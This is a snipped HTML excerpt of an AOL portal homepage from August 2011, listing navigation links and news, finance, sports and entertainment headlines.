<li><a title="News" name="om_hnav_sec1_link1" class="icid-navbar_rootnews lnid-sec1_lnk2" href="http://www.huffingtonpost.com/"><b>
...[SNIP]...
<div class='hnav_header'><a title="News" name="om_hnav_sec1_link1" class="icid-navbar_rootnews lnid-sec1_lnk2" href="http://www.huffingtonpost.com/"><b>
...[SNIP]...
<td class='underline_cell'><a title="Breaking News and Opinion on The Huffington Post" name="om_hnav_sec1_link3" class="icid-navbar_huffpo lnid-sec1_lnk3" href="http://www.huffingtonpost.com/">Huffington Post</a>
...[SNIP]...
<td class='underline_cell'><a title="Politics News and Opinion on The Huffington Post" name="om_hnav_sec1_link4" class="icid-navbar_politics lnid-sec1_lnk4" href="http://www.huffingtonpost.com/politics">Politics</a>
...[SNIP]...
<td class='underline_cell'><a title="Pro and college sports news, stats, scores and player updates from SportingNews" name="om_hnav_sec1_link5" class="icid-navbar_sports lnid-sec1_lnk5" href="http://aol.sportingnews.com">Sports</a>
...[SNIP]...
<td><a title="World News and Opinion on The Huffington Post" name="om_hnav_sec1_link7" class="icid-navbar_world lnid-sec1_lnk7" href="http://www.huffingtonpost.com/world">World</a>
...[SNIP]...
<li><a title="Entertainment" name="om_hnav_sec2_link1" class="icid-navbar_rootentertainment lnid-sec2_lnk2" href="http://www.huffingtonpost.com/entertainment/"><b>
...[SNIP]...
<div class='hnav_header'><a title="Entertainment" name="om_hnav_sec2_link1" class="icid-navbar_rootentertainment lnid-sec2_lnk2" href="http://www.huffingtonpost.com/entertainment/"><b>
...[SNIP]...
<td class='underline_cell'><a title="Celebrity news and photos and top music, movie and TV news" name="om_hnav_sec2_link3" class="icid-navbar_entnews lnid-sec2_lnk3" href="http://www.huffingtonpost.com/celebrity/">Celebrity News</a>
...[SNIP]...
<td class='underline_cell'><a title="Comedy News and Opinion on the Huffington Post" name="om_hnav_sec2_link4" class="icid-navbar_comedy lnid-sec2_lnk4" href="http://www.huffingtonpost.com/comedy">Comedy</a>
...[SNIP]...
<td class='underline_cell'><a title="Play hundreds of free online games from Games.com" name="om_hnav_sec2_link5" class="icid-navbar_games lnid-sec2_lnk5" href="http://www.games.com">Games</a>
...[SNIP]...
<td class='underline_cell'><a title="Movie news, show times, tickets, trailers and more from Moviefone" name="om_hnav_sec2_link6" class="icid-navbar_movies lnid-sec2_lnk6" href="http://www.moviefone.com">Movies</a>
...[SNIP]...
<li><a title="Finance" name="om_hnav_sec3_link1" class="icid-navbar_rootfinance lnid-sec3_lnk2" href="http://www.dailyfinance.com"><b>
...[SNIP]...
<div class='hnav_header'><a title="Finance" name="om_hnav_sec3_link1" class="icid-navbar_rootfinance lnid-sec3_lnk2" href="http://www.dailyfinance.com"><b>
...[SNIP]...
<td class='underline_cell'><a title="Business News and Opinion on The Huffington Post" name="om_hnav_sec3_link3" class="icid-navbar_business lnid-sec3_lnk3" href="http://www.huffingtonpost.com/business">Business News</a>
...[SNIP]...
<td class='underline_cell'><a title="Business news, stock quotes and investment advice" name="om_hnav_sec3_link4" class="icid-navbar_Finance lnid-sec3_lnk4" href="http://www.dailyfinance.com">DailyFinance</a>
...[SNIP]...
<td class='underline_cell'><a title="Your quotes, news and summary from DailyFinance" name="om_hnav_sec3_link6" class="icid-navbar_myportfolios lnid-sec3_lnk6" href="http://www.dailyfinance.com/portfolios/myportfolios">My Portfolios</a>
...[SNIP]...
<td><a title="Small business news from the Huffington Post" name="om_hnav_sec3_link8" class="icid-navbar_smallbus lnid-sec3_lnk8" href="http://www.huffingtonpost.com/news/small-business-america/">Small Business</a>
...[SNIP]...
<li><a title="Tech" name="om_hnav_sec4_link1" class="icid-navbar_roottech lnid-sec4_lnk2" href="http://techcrunch.com"><b>
...[SNIP]...
<div class='hnav_header'><a title="Tech" name="om_hnav_sec4_link1" class="icid-navbar_roottech lnid-sec4_lnk2" href="http://techcrunch.com"><b>
...[SNIP]...
<td class='underline_cell'><a title="Coverage of everything new in gadgets and consumer electronics" name="om_hnav_sec4_link3" class="icid-navbar_engadget lnid-sec4_lnk3" href="http://www.engadget.com/">Engadget</a>
...[SNIP]...
<td class='underline_cell'><a title="The definitive source for news and information on the video game industry" name="om_hnav_sec4_link4" class="icid-navbar_joystiq lnid-sec4_lnk4" href="http://www.joystiq.com/">Joystiq</a>
...[SNIP]...
<td class='underline_cell'><a title="Your source for Apple news, tips, reviews and how-tos" name="om_hnav_sec4_link5" class="icid-navbar_tuaw lnid-sec4_lnk5" href="http://www.tuaw.com/">TUAW</a>
...[SNIP]...
<td><a title="A blog about technology news and analysis, as well as profiling of startup companies, products and websites" name="om_hnav_sec4_link6" class="icid-navbar_techcrunch lnid-sec4_lnk6" href="http://techcrunch.com/">TechCrunch</a>
...[SNIP]...
<li><a title="Style" name="om_hnav_sec5_link1" class="icid-navbar_rootstyle lnid-sec5_lnk2" href="http://www.huffingtonpost.com/style"><b>
...[SNIP]...
<div class='hnav_header'><a title="Style" name="om_hnav_sec5_link1" class="icid-navbar_rootstyle lnid-sec5_lnk2" href="http://www.huffingtonpost.com/style"><b>
...[SNIP]...
<td class='underline_cell'><a title="African American news, culture and community" name="om_hnav_sec5_link3" class="icid-navbar_bv lnid-sec5_lnk3" href="http://www.blackvoices.com/">Black Voices</a>
...[SNIP]...
<td class='underline_cell'><a title="Parenting advice, news, deals and more from ParentDish" name="om_hnav_sec5_link4" class="icid-navbar_parent lnid-sec5_lnk4" href="http://www.huffingtonpost.com/parents/">Family</a>
...[SNIP]...
<td class='underline_cell'><a title="Recipes, Cooking Tips, Food Advice and Menus" name="om_hnav_sec5_link5" class="icid-navbar_food lnid-sec5_lnk5" href="http://www.kitchendaily.com">Food</a>
...[SNIP]...
<td class='underline_cell'><a title="Health information, news, diet and fitness tips, tools and more" name="om_hnav_sec5_link6" class="icid-navbar_health lnid-sec5_lnk6" href="http://www.everydayhealth.com/aol">Health</a>
...[SNIP]...
<td class='underline_cell'><a title="Daily, weekly and monthly forecasts, astrology, tarot and numerology" name="om_hnav_sec5_link8" class="icid-navbar_horo lnid-sec5_lnk8" href="http://horoscopes.mydaily.com">Horoscopes</a>
...[SNIP]...
<td class='underline_cell'><a title="Latin American news, photos, AIM and free e-mail in Spanish" name="om_hnav_sec5_link9" class="icid-navbar_latino lnid-sec5_lnk9" href="http://www.aollatino.com/">Latino</a>
...[SNIP]...
<td class='underline_cell'><a title="Fashion trends, product reviews, beauty tips and more from StyleList" name="om_hnav_sec5_link10" class="icid-navbar_style lnid-sec5_lnk10" href="http://www.stylelist.com">StyleList</a>
...[SNIP]...
<td><a title="Healthy Living News and Opinion" name="om_hnav_sec5_link12" class="icid-navbar_wellness lnid-sec5_lnk12" href="http://www.huffingtonpost.com/healthy-living">Wellness</a>
...[SNIP]...
<td class='underline_cell'><a title="Offering free, online coupon codes and cash back savings for online discounts" name="om_hnav_sec6_link3" class="icid-navbar_coupons lnid-sec6_lnk3" href="http://shortcuts.com/">Coupons</a>
...[SNIP]...
<td class='underline_cell'><a title="Lets you quickly build simple and visually elegant splash pages that point visitors to your content from around the web." name="om_hnav_sec7_link4" class="icid-navbar_aboutme lnid-sec7_lnk4" href="https://about.me/">About.Me</a>
...[SNIP]...
<li><a title="Play hundreds of free online games from Games.com" name="om_hnav_sec8_link1" class="icid-navbar_rootgames lnid-sec8_lnk1" href="http://www.games.com"><b>
...[SNIP]...
<li><a title="Get maps, driving directions, gas prices, local information and more" name="om_hnav_sec10_link1" class="icid-navbar_rootmapquest lnid-sec10_lnk1" href="http://www.mapquest.com/"><b>
...[SNIP]...
<li><a title="Your source for local knowledge" name="om_hnav_sec11_link1" class="icid-navbar_rootpatch lnid-sec11_lnk1" href="http://www.patch.com"><b>
...[SNIP]...
<li><a title="Free online radio offering 350+ sports, news, talk and music stations" name="om_hnav_sec12_link1" target="_blank" class="icid-navbar_rootradio lnid-sec12_lnk1" href="http://player.radio.com/player/AOLPlayer.php?version=1.2.11740&amp;station=+StationID+oString"><b>
...[SNIP]...
</span>
<a id="dlimg" name="om_dl5_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl5|sec1_lnk1|87399" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/"><img height="217" alt="Secret to Saving on Diamond Ring" width="386" src="http://o.aolcdn.com/hss/storage/adam/dd176a4a16b8a6c303340f54cab9cdf6/ring-386az08172011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl5_hdln" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl5|sec1_lnk2|87399">Secrets to Buying a Diamond Ring


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl5_cpy" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl5|sec1_lnk3|87399">Minimum amount you should pay

</a>
...[SNIP]...
<li ><a name="om_dl5_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl5|sec3_lnk1|87399" href="http://www.dailyfinance.com/2011/08/09/savings-experiment-how-to-get-a-sun-kissed-look-for-less/">Affordable Way to Keep Your Tan
</a>
...[SNIP]...
<li ><a name="om_dl5_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl5|sec3_lnk2|87399" href="http://www.dailyfinance.com/2011/08/02/savings-experiment-how-to-save-money-on-a-mattress/">Mattress-Buying Mistake to Avoid</a>
...[SNIP]...
<li ><a name="om_dl5_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl5|sec3_lnk3|87399" href="http://www.dailyfinance.com/2011/06/07/savings-experiment-pay-less-for-household-paper-products/">How to Save More on Toilet Paper
</a>
...[SNIP]...
<h2 id="om_news_more-news_title"><a class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/">Latest Headlines</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/wall-street-sell-off_n_930510.html" class="lnid-sec2_lnk1">Stocks Plunge As More Signs Of Economic Weakness Emerge</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/officials-change-deportation-policy_n_930688.html" class="lnid-sec2_lnk2">Officials Change Deportation Policy</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/bahrain-protesters-clash-_n_930877.html" class="lnid-sec2_lnk3">Bahrain Protesters Clash With Security Forces</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/aig-bailout_n_930867.html" class="lnid-sec2_lnk4">AIG Repays $2.15 Billion Of Its Bailout Money</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/2-men-plead-guilty-in-swa_n_930827.html" class="lnid-sec2_lnk5">Two Plead Guilty For Branding Swastika On Navajo Man</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/mohammad-younis-man-linke_n_930844.html" class="lnid-sec2_lnk6">Man Linked To Times Square Bomber Pleads Guilty</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/afghanistan-roadside-bomb_n_930780.html" class="lnid-sec2_lnk7">Roadside Bomb Kills 12 Children In Afghanistan</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/elizabeth-warren-exploratory-committee_n_930530.html" class="lnid-sec2_lnk8">Elizabeth Warren Takes Next Step Toward Possible Senate Run</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class="lnid-sec2_lnk9">Norway Killer Called Authorities Twice During Shooting, Police Say</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/los-angeles-downgraded-by_n_930296.html" class="lnid-sec2_lnk10">Los Angeles Downgraded By Standard & Poor's</a>
...[SNIP]...
</ul><a name="om_news_more-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.huffingtonpost.com">More News</a>
...[SNIP]...
<h2><a name="om_marketquotes_title" href="http://www.dailyfinance.com/market-news/" class=" lnid-sec1_lnk1">Market Quotes</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote1" href="http://www.dailyfinance.com/quotes/dow-jones-industrial-average/%24indu/dji">

DJIA
</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote2" href="http://www.dailyfinance.com/quotes/nasdaq-composite/%24compx/nai">

NASDAQ
</a>
...[SNIP]...
<span class="sprite down"><img class="noion" src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="down"></span>
...[SNIP]...
<td class="ticker-name"><a name="om_marketquotes_quote3" href="http://www.dailyfinance.com/quotes/sandp-500-index-rth/%24inx/cmi">

S&P 500
</a>
...[SNIP]...
<div class="markets-footer">
<a name="om_marketquotes_link1" class="lnid-sec2_lnk1 first" href="http://www.dailyfinance.com/portfolios/myportfolios">My Portfolios</a><a name="om_marketquotes_link2" class="lnid-sec2_lnk2" href="http://www.dailyfinance.com/market-news/">Markets</a><a name="om_marketquotes_link3" class="lnid-sec2_lnk3 last" href="http://www.dailyfinance.com/">Finance News</a>
...[SNIP]...
<h2 id="om_news_business-news_title"><a class="lnid-sec1_lnk1" href="http://www.dailyfinance.com/">Business News</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk1" href="http://www.dailyfinance.com/market-news/">More Signs of Economic Weakness Spark Major Selloff</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk2" href="http://www.dailyfinance.com/2011/08/18/are-you-photoshopping-your-finances/">Are Your Photoshopping Your Finances?</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk3" href="http://www.dailyfinance.com/2011/08/17/u-s-credit-card-debt-declines/">How to Dig Yourself Out of Credit Card Debt</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk4" href="http://www.dailyfinance.com/2011/08/18/back-to-school-fashion-uniforms-gain-popularity-and-coolness/">School Uniforms: More Popular, More Fashionable</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk5" href="http://money.cnn.com/2011/08/18/news/international/markets_morgan_stanley/index.htm?iid=HP_LN">Morgan Stanley: We're 'Dangerously Close' to Recession</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk6" href="http://247wallst.com/2011/08/17/the-richest-diamond-mines-in-the-world/">The Richest Diamond Mines in the World</a>
...[SNIP]...
</ul><a name="om_news_business-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.dailyfinance.com/">More Business News</a>
...[SNIP]...
<h2 id="om_news_sports-news_title"><a class="lnid-sec1_lnk1" href="http://www.fanhouse.com/">Sports News</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl" class="lnid-sec2_lnk1">Basketball Game in China Ends With Bench-Clearing Brawl</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nfl/story/2011-08-18/michael-vick-to-gq-i-miss-my-dogs" class="lnid-sec2_lnk2">Michael Vick Says He Misses Owning Dogs</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/mlb/story/2011-08-18/hideki-irabus-death-officially-ruled-a-suicide" class="lnid-sec2_lnk3">Ex-Yankee Irabu's Death Officially Ruled a Suicide</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar" class="lnid-sec2_lnk4">Former Price is Right Model Making NASCAR Debut</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/sport/story/2011-08-18/tiger-woods-lebron-james-accused-of-being-cheap-tippers" class="lnid-sec2_lnk5">Tiger, LeBron accused of being cheap tippers</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/mlb/story/2011-08-18/mike-jacobs-tests-positive-for-hgh-is-released-by-rockies" class="lnid-sec2_lnk6">Minor League Player Suspended 50 Games for HGH Use</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/ncaa-football/story/2011-08-18/barry-alvarez-chad-1-million-loss-in-shapiro-ponzi-scheme" class="lnid-sec2_lnk7">Wisconsin AD and Family Lose $1 Million in Ponzi Scheme</a>
...[SNIP]...
</ul><a name="om_news_sports-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.fanhouse.com">More Stories</a>
...[SNIP]...
<h2 id="om_news_entertainment-news_title"><a class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/entertainment/">Entertainment News</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/josh-groban-joins-the-office_n_930818.html" class="lnid-sec2_lnk1">'The Office' Gets An Unexpected New Star</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/betty-white-is-americas-most-trusted-celebrity_n_930740.html" class="lnid-sec2_lnk2">Betty White: America's Most Trusted Celebrity</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/stage-collapse-at-pukkelpop-belgium-kills_n_930705.html" class="lnid-sec2_lnk3">Another Stage Collapse Kills At Least One</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/texas-killing-fields-trailer_n_930675.html" class="lnid-sec2_lnk4">Sam Worthington, Jessica Chastain Enter Killing Fields</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/justin-bieber-tops-list-of-richest-teen-entertainers_n_930578.html" class="lnid-sec2_lnk5">Who Are Hollywood's Richest Teens?</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/blade-runner-ridley-scott-new-film_n_930593.html" class="lnid-sec2_lnk6">Legendary Film Getting Unexpected Revamp</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/burt-reynolds-facing-foreclosure_n_930443.html" class="lnid-sec2_lnk7">Burt Reynolds Facing Foreclosure</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/kim-kardashians-wedding-workout_n_930316.html" class="lnid-sec2_lnk8">WATCH: Kim Kardashian's Wedding Workout</a>
...[SNIP]...
</ul><a name="om_news_entertainment-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.huffingtonpost.com/entertainment/">More Entertainment News</a>
...[SNIP]...
andalonevj-.5- adrefresh-true hiderelvids- lnid-sec2_lnk1 vplident-1116699228001 vplname-urlesque-mans-about-to-do-the-impossible" href="video/urlesque-mans-about-to-do-the-impossible/1116699228001/"><img height="155" width="233" class="vjimg" src="http://i.huffpost.com/gen/332441/thumbs/a-MAN-DEFIES-PHYSICS-233x155.jpg"/><div class="vbpos-bottom-right videobutton" style="width:41px; height:41px; ">
<img src="http://portal.aolcdn.com/p5/forms/1439/4d409bd3-5f87-4f0a-adb2-b0fa9450f8c6.png" alt="" class="playbutton" title=""/><img src="http://portal.aolcdn.com/p5/forms/1439/b81d51ea-1a48-4e8d-9495-9ecbf12c337c.png" alt="" class="playbutton-over" title=""/><div class="vbtext" title="">
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz1 plid-87598">
<a title="Price Is Right" name="om_daily-buzz_image_1" class="photo-link lnid-sec2_lnk1" href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar"><img alt="Price Is Right" src="http://i.huffpost.com/gen/332819/thumbs/a-MODEL-NASCAR-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline1" href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar" class=" lnid-sec2_lnk3">Former 'Price Is Right' Model Makes Unexpected Debut</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz2 plid-87597">
<a title="Chipotle" name="om_daily-buzz_image_2" class="photo-link lnid-sec3_lnk1" href="http://www.huffingtonpost.com/2011/08/18/chipotle-menu_n_930267.html"><img alt="Chipotle" src="http://i.huffpost.com/gen/332774/thumbs/a-CHIPOTLE-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline2" href="http://www.huffingtonpost.com/2011/08/18/chipotle-menu_n_930267.html" class=" lnid-sec3_lnk3">Chipotle Makes Nauseating Confession</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz3 plid-87639">
<a title="Russell Armstrong" name="om_daily-buzz_image_3" class="photo-link lnid-sec4_lnk1" href="http://www.huffingtonpost.com/2011/08/18/russell-armstrong-suicide-salary-bravo_n_930722.html"><img alt="Russell Armstrong" src="http://portal.aolcdn.com/p5/forms/656/00174597-3ffe-4883-9330-a301427eb1b9.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline3" href="http://www.huffingtonpost.com/2011/08/18/russell-armstrong-suicide-salary-bravo_n_930722.html" class=" lnid-sec4_lnk3">Russell's 'Housewives' Salary Not What You Might Think</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz4 plid-87646">
<a title="Belgium stage collapse" name="om_daily-buzz_image_4" class="photo-link lnid-sec5_lnk1" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/"><img alt="Belgium stage collapse" src="http://portal.aolcdn.com/p5/forms/2560/b289c2ee-3110-4211-98a8-3ec20b6bf58f.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline4" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/" class=" lnid-sec5_lnk3">Amateur Video Captures Deadly Stage Collapse</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz5 plid-87595">
<a title="Pug" name="om_daily-buzz_image_5" class="photo-link lnid-sec6_lnk1" href="http://www.huffingtonpost.com/2011/08/17/otis-the-skydiving-pug-photo-video_n_929874.html"><img alt="Pug" src="http://i.huffpost.com/gen/332759/thumbs/a-PUG-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline5" href="http://www.huffingtonpost.com/2011/08/17/otis-the-skydiving-pug-photo-video_n_929874.html" class=" lnid-sec6_lnk3">Watch: 'Skydiving Pug' Makes 64th Jump</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz6 plid-87599">
<a title="Obama" name="om_daily-buzz_image_6" class="photo-link lnid-sec7_lnk1" href="http://www.huffingtonpost.com/2011/08/18/presidential-vacations-th_n_929376.html"><img alt="Obama" src="http://i.huffpost.com/gen/332814/thumbs/a-OBAMA-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline6" href="http://www.huffingtonpost.com/2011/08/18/presidential-vacations-th_n_929376.html" class=" lnid-sec7_lnk3">Photos: Embarrassing Pics Of Presidents on Vacation</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz7 plid-87559">
<a title="Nivea" name="om_daily-buzz_image_7" class="photo-link lnid-sec8_lnk1" href="http://www.huffingtonpost.com/2011/08/18/nivea-ad-racist_n_930501.html"><img alt="Nivea" src="http://i.huffpost.com/gen/332706/thumbs/a-NIVEA-1-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline7" href="http://www.huffingtonpost.com/2011/08/18/nivea-ad-racist_n_930501.html" class=" lnid-sec8_lnk3">Is Nivea's Controversial Ad <i>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz8 plid-87561">
<a title="Walmart" name="om_daily-buzz_image_8" class="photo-link lnid-sec9_lnk1" href="http://www.huffingtonpost.com/2011/08/18/monkey-scratches-young-girl_n_930365.html"><img alt="Walmart" src="http://i.huffpost.com/gen/332686/thumbs/a-GIRL-MONKEY-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline8" href="http://www.huffingtonpost.com/2011/08/18/monkey-scratches-young-girl_n_930365.html" class=" lnid-sec9_lnk3">Watch: Monkey Attacks Girl In Walmart Parking Lot</a>
...[SNIP]...
<a title="Lady Gaga" name="om_daily-buzz_image_9" class="photo-link lnid-sec10_lnk1" href="http://blog.music.aol.com/2011/08/18/lady-gaga-goes-braless-for-vma-promo"><img alt="Lady Gaga" src="http://i.huffpost.com/gen/303009/thumbs/a-GAGA-TWITTER-233x155.jpg"/></a>
...[SNIP]...
</span>
<a target="_blank" class="feedback" href="http://www.opselect.com/ad_feedback/survey.adp?src=115">Ad Feedback</a>
...[SNIP]...
<a id="adchoicelink" name="om_adchoices_link" class="feedback" href="http://adinfo.aol.com/about-our-ads/">Ad Choices<img class="feedback" src="http://portal.aolcdn.com/p5/forms/1245/9db9a9bc-ecd8-4f18-a67c-adc647f55731.jpg"/></a>
...[SNIP]...
<h3><a name="om_custom-content-1_headline" href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011" class=" lnid-sec2_lnk1">Kick-Start Cleanse Community Challenge</a>
...[SNIP]...
<div class="video-still">
<a alt="" name="om_custom-content-1_image" href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011"><img height="131" width="131" src="http://portal.aolcdn.com/p5/forms/678/b7783c03-e35d-42ef-9dad-f25c9643bfaa.jpg"/></a>
...[SNIP]...
<b><a href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011" class=" lnid-sec2_lnk2">Sign up now!</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html" name="om_trending-stories_img_1" class="lnid-sec1_lnk1 storyimg"><img src="http://i.huffpost.com/gen/331945/thumbs/s-CHRISTINE-ODONNELL-INTERVIEW-WITCHCRAFT-mini.jpg" alt="CHRISTINE ODONNELL INTERVIEW WITCHCRAFT"/></a><p><a href="http://www.huffingtonpost.com/politics" name="om_trending-stories_attr_1" class="lnid-sec1_lnk3 storyattr">Politics</a>: <a href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html" name="om_trending-stories_link_1" class="lnid-sec1_lnk2 storytxt">Christine O'Donnell Walks Out Of CNN Interview</a>
...[SNIP]...
<div class="story">
<a href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" name="om_trending-stories_img_2" class="lnid-sec2_lnk1 storyimg"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/08/death-social-security-240cs081711_74x58.jpg" alt=""/></a><p><a href="http://www.dailyfinance.com" name="om_trending-stories_attr_2" class="lnid-sec2_lnk3 storyattr">Daily Finance</a>: <a href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" name="om_trending-stories_link_2" class="lnid-sec2_lnk2 storytxt">Social Security Mistakenly Declares Thousands Dead Each Year</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html" name="om_trending-stories_img_3" class="lnid-sec3_lnk1 storyimg"><img src="http://i.huffpost.com/gen/332133/thumbs/s-ANDERSON-COOPER-mini.jpg" alt="ANDERSON COOPER"/></a><p><a href="http://www.huffingtonpost.com/media" name="om_trending-stories_attr_3" class="lnid-sec3_lnk3 storyattr">Media</a>: <a href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html" name="om_trending-stories_link_3" class="lnid-sec3_lnk2 storytxt">WATCH: Anderson Cooper LOSES It, Collapses Into Huge Fit Of Giggles</a>
...[SNIP]...
<div class="story">
<a href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" name="om_trending-stories_img_4" class="lnid-sec4_lnk1 storyimg"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/08/diamond-ring-240cs081611-1313425590_74x58.jpg" alt="Diamond Ring"/></a><p><a href="http://www.dailyfinance.com" name="om_trending-stories_attr_4" class="lnid-sec4_lnk3 storyattr">Daily Finance</a>: <a href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" name="om_trending-stories_link_4" class="lnid-sec4_lnk2 storytxt">Savings Experiment: Get the Best Bling for Your Buck When Buying a Diamond Ring</a>
...[SNIP]...
<div class="story">
<a href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/" name="om_trending-stories_img_5" class="lnid-sec5_lnk1 storyimg"><img src="http://www.blogcdn.com/www.aoltv.com/media/2011/07/kat-von-d-tlc-la-ink-300_74x58.jpg" alt="TLC has canceled 'LA Ink.'"/></a><p><a href="http://www.aoltv.com" name="om_trending-stories_attr_5" class="lnid-sec5_lnk3 storyattr">AOL TV</a>: <a href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/" name="om_trending-stories_link_5" class="lnid-sec5_lnk2 storytxt">'LA Ink' Canceled by TLC</a>
...[SNIP]...
<div class="story">
